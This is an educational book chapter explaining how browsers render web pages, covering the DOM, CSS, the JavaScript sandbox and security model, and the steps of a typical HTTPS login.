3
HOW BROWSERS WORK

image

Most internet users interact with websites through a browser. To build secure websites, you need to understand how browsers transform the HyperText Markup Language (HTML) used to describe web pages into the interactive, visual representations you see onscreen. This chapter covers how a modern browser renders a web page, highlighting the security measures it puts in place to protect the user—the browser security model. We’ll also look at the various ways hackers try to overcome these security measures.

Web Page Rendering

The software component within a web browser that’s responsible for transforming a web page’s HTML into the visual representation you see onscreen is called the rendering pipeline. The rendering pipeline is responsible for parsing the page’s HTML, understanding the structure and content of the document, and converting it to a series of drawing operations that the operating system can understand.

For websites in the early days of the internet, this process was relatively simple. Web page HTML contained very little styling information (such as color, font, and font size), so rendering was mostly a matter of loading text and images and drawing them onscreen in the order they appeared in the HTML document. HTML was envisioned as a markup language, meaning it described the web page by breaking it into semantic elements and annotating how the information was structured. The early web looked pretty crude, but was very efficient for relaying textual content.

Nowadays, web design is more elaborate and visually appealing. Web developers encode styling information into separate Cascading Style Sheets (CSS) files, which instruct the browser precisely how each page element is to be displayed. A modern, hyperoptimized browser like Google Chrome contains several million lines of code to correctly interpret and render HTML and deal with conflicting styling rules in a fast, uniform manner. Understanding the various stages that make up the rendering pipeline will help you appreciate this complexity.

The Rendering Pipeline: An Overview

We’ll get into the details of each stage of the rendering pipeline in a moment, but first let’s look at the high-level process.

When the browser receives an HTTP response, it parses the HTML in the body of the response into a Document Object Model (DOM): an in-memory data structure that represents the browser’s understanding of the way the page is structured. Generating the DOM is an interim step between parsing the HTML and drawing it onscreen. In modern HTML, the layout of the page can’t be determined until the whole of the HTML is parsed, because the order of the tags in the HTML doesn’t necessarily determine the location of their content.

Once the browser generates the DOM, but before anything can be drawn onscreen, styling rules must be applied to each DOM element. These styling rules declare how each page element is to be drawn—the foreground and background color, the font style and size, the position and alignment, and so on. Last, after the browser finalizes the structure of the page and breaks down how to apply styling information, it draws the web page onscreen. All of this happens in a fraction of a second, and repeats on a loop as the user interacts with the page.

The browser also loads and executes any JavaScript it comes across as it constructs the DOM. JavaScript code can dynamically make changes to the DOM and styling rules, either before the page is rendered or in response to user actions.

Now let’s look at each step in more detail.

The Document Object Model

When a browser first receives an HTTP response containing HTML, it parses the HTML document into a DOM, a data structure describing the HTML document as a series of nested elements called DOM nodes. Some nodes in the DOM correspond to elements to be rendered onscreen, such as input boxes and paragraphs of text; other nodes, such as script and styling elements, control the page’s behavior and layout.

Each DOM node is roughly equivalent to a tag in the original HTML document. DOM nodes can contain text content, or contain other DOM nodes, similar to the way HTML tags can be nested within each other. Because each node can contain other nodes in a branching fashion, web developers talk about the DOM tree.

Some HTML tags, like the <script>, <style>, <image>, <font>, and <video> tags, can reference an external URL in an attribute. When they’re parsed into the DOM, these tags cause the browser to import the external resources, meaning that the browser must initiate a further HTTP request. Modern browsers perform these requests in parallel to the page rendering, in order to speed up the page-load time.

The construction of the DOM from HTML is designed to be as robust as possible. Browsers are forgiving about malformed HTML; they close unclosed tags, insert missing tags, and ignore corrupted tags as needed. Browser vendors don’t punish the web user for the website’s errors.

Styling Information

Once the browser has constructed the DOM tree, it needs to determine which DOM nodes correspond to onscreen elements, how to lay out those elements relative to each other, and what styling information to apply to them. Though these styling rules can be defined inline in the HTML document, web developers prefer to encode styling information in separate CSS files. Separating the styling information from the HTML content makes restyling existing content easier and keeps HTML content as clean and semantic as possible. It also makes HTML easier to parse for alternative browsing technologies such as screen readers.

When using CSS, a web developer will create one or more stylesheets to declare how elements on the page should be rendered. The HTML document will import these stylesheets by using a <style> tag referencing the external URL that hosts the stylesheet. Each stylesheet contains selectors that pick out tags in the HTML document and assign styling information, such as font size, colors, and position, to each. Selectors may be simple: they might state, for example, that heading text in an <h1> tag should be rendered in blue. For more complex web pages, selectors get more convoluted: a selector may describe how quickly a hyperlink changes color when the user moves their mouse over it.

The rendering pipeline implements a lot of logic to decipher final styling, because strict rules of precedence need to be followed about how styles are applied. Each selector can apply to multiple page elements, and each page element will often have styling information supplied by several selectors. One of the growing pains of the early internet was figuring out how to create a website that looked the same when rendered by different types of browsers. Modern browsers are generally consistent in the way they render a web page, but they still vary. The industry’s benchmark for compliance to web standards is the Acid3 test, as shown in Figure 3-1. Only a few browsers score 100. You can visit http://acid3.acidtests.org/ to try out the Acid3 test.

image

Figure 3-1: Acid3, making sure browsers can render colored rectangles correctly since 2008

The construction of the DOM tree and the application of styling rules occur in parallel to the processing of any JavaScript code contained in the web page. This JavaScript code can change the structure and layout of the page even before it’s rendered, so let’s take a quick look at how the execution of JavaScript dovetails with the rendering pipeline.

JavaScript

Modern web pages use JavaScript to respond to user actions. JavaScript is a fully fledged programming language that is executed by the browser’s JavaScript engine when web pages are rendered. JavaScript can be incorporated into an HTML document by using a <script> tag; the code may be included inline within the HTML document, or, more typically, the <script> tag will reference a JavaScript file that is to be loaded from an external URL.

By default, any JavaScript code is executed by the browser as soon as the relevant <script> tag is parsed into a DOM node. For JavaScript code loaded from an external URL, this means the code is executed as soon as it is loaded.

This default behavior causes problems if the rendering pipeline hasn’t finished parsing the HTML document; the JavaScript code will attempt to interact with page elements that may not yet exist in the DOM. To allow for this, <script> tags are often marked with a defer attribute. This causes the JavaScript to execute only when the entire DOM has been constructed.

As you would imagine, the fact that browsers eagerly execute any JavaScript code they come across has security implications. A hacker’s end goal is often the remote execution of code on another user’s machine, and the internet makes this goal much easier, as it’s rare to find a computer that isn’t connected to the network in some way. For this reason, modern browsers heavily restrict JavaScript with the browser security model. This dictates that JavaScript code must be executed within a sandbox, where it’s not permitted to perform any of the following actions:

  • Start new processes or access other existing processes.

  • Read arbitrary chunks of system memory. As a managed memory language, JavaScript can’t read memory outside its sandbox.

  • Access the local disk. Modern browsers allow websites to store small amounts of data locally, but this storage is abstracted from the filesystem itself.

  • Access the operating system’s network layer.

  • Call operating system functions.

JavaScript executing in the browser sandbox is permitted to do the following actions:

  • Read and manipulate the DOM of the current web page.

  • Listen to and respond to user actions on the current page by registering event listeners.

  • Make HTTP calls on behalf of the user.

  • Open new web pages or refresh the URL of the current page, but only in response to a user action.

  • Write new entries to the browser history and go backward and forward in history.

  • Ask for the user’s location. For example, “Google Maps would like to use your location.”

  • Ask permission to send desktop notifications.

Even with these restrictions, an attacker who can inject malicious JavaScript into your web page can still do a lot of harm by using cross-site scripting to read credit card details or credentials as a user enters them. Even tiny amounts of injected JavaScript pose a threat, because injected code can add <script> tags in the DOM to load a malicious payload. We’ll look at how to protect against this type of cross-site scripting attack in Chapter 7.

Before and After Rendering: Everything Else the Browser Does

A browser is much more than a rendering pipeline and a JavaScript engine. In addition to rendering HTML and executing JavaScript, modern browsers contain logic for many other responsibilities. Browsers connect with the operating system to resolve and cache DNS addresses, interpret and verify security certificates, encode requests in HTTPS if needed, and store and transmit cookies according to the web server’s instructions. To understand how these responsibilities fit together, let’s take a behind-the-scenes look at a user logging into Amazon:

  1. The user visits www.amazon.com in their favorite browser.

  2. The browser attempts to resolve the domain (amazon.com) to an IP address. First, the browser consults the operating system’s DNS cache. If it finds no results, it asks the internet service provider to look in the provider’s DNS cache. In the unlikely event that nobody on the ISP has visited the Amazon website before, the ISP will resolve the domain at an authoritative DNS server.

  3. Now that it has resolved the IP address, the browser attempts to initiate a TCP handshake with the server corresponding to the IP address in order to establish a secure connection.

  4. Once the TCP session has been established, the browser constructs an HTTP GET request to www.amazon.com. TCP splits the HTTP request into packets and sends them to the server to be reassembled.

  5. At this point, the HTTP conversation upgrades to HTTPS to ensure secure communication. The browser and server undertake a TLS handshake, agree on an encryption cypher, and exchange encryption keys.

  6. The server uses the secure channel to send back an HTTP response containing HTML of the Amazon front page. The browser parses and displays the page, typically triggering many other HTTP GET requests.

  7. The user navigates to the login page, enters their login credentials, and submits the login form, which generates a POST request to the server.

  8. The server validates the login credentials and establishes a session by returning a Set-Cookie header in the response. The browser stores the cookie for the prescribed time, and sends it back with subsequent requests to Amazon.

After all of this happens, the user can access their Amazon account.

Summary

This chapter reviewed how browsers transform the HTML used to describe web pages into the interactive, visual representations you see onscreen. The browser’s rendering pipeline parses HTML documents into a Document Object Model (DOM), applies styling information from Cascading Style Sheets (CSS) files, and then lays out the DOM nodes onscreen.

You also learned about the browser security model. The browser executes JavaScript included in <script> tags under strict security rules. You also reviewed a simple HTTP conversation illustrating the browser’s many other responsibilities beyond rendering pages: reconstructing HTTP from TCP packets, verifying security certificates and securing communication using HTTPS, and storing and transmitting cookies.

In the next chapter, you’ll look at the other end of the HTTP conversation: the web server.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.141.27.244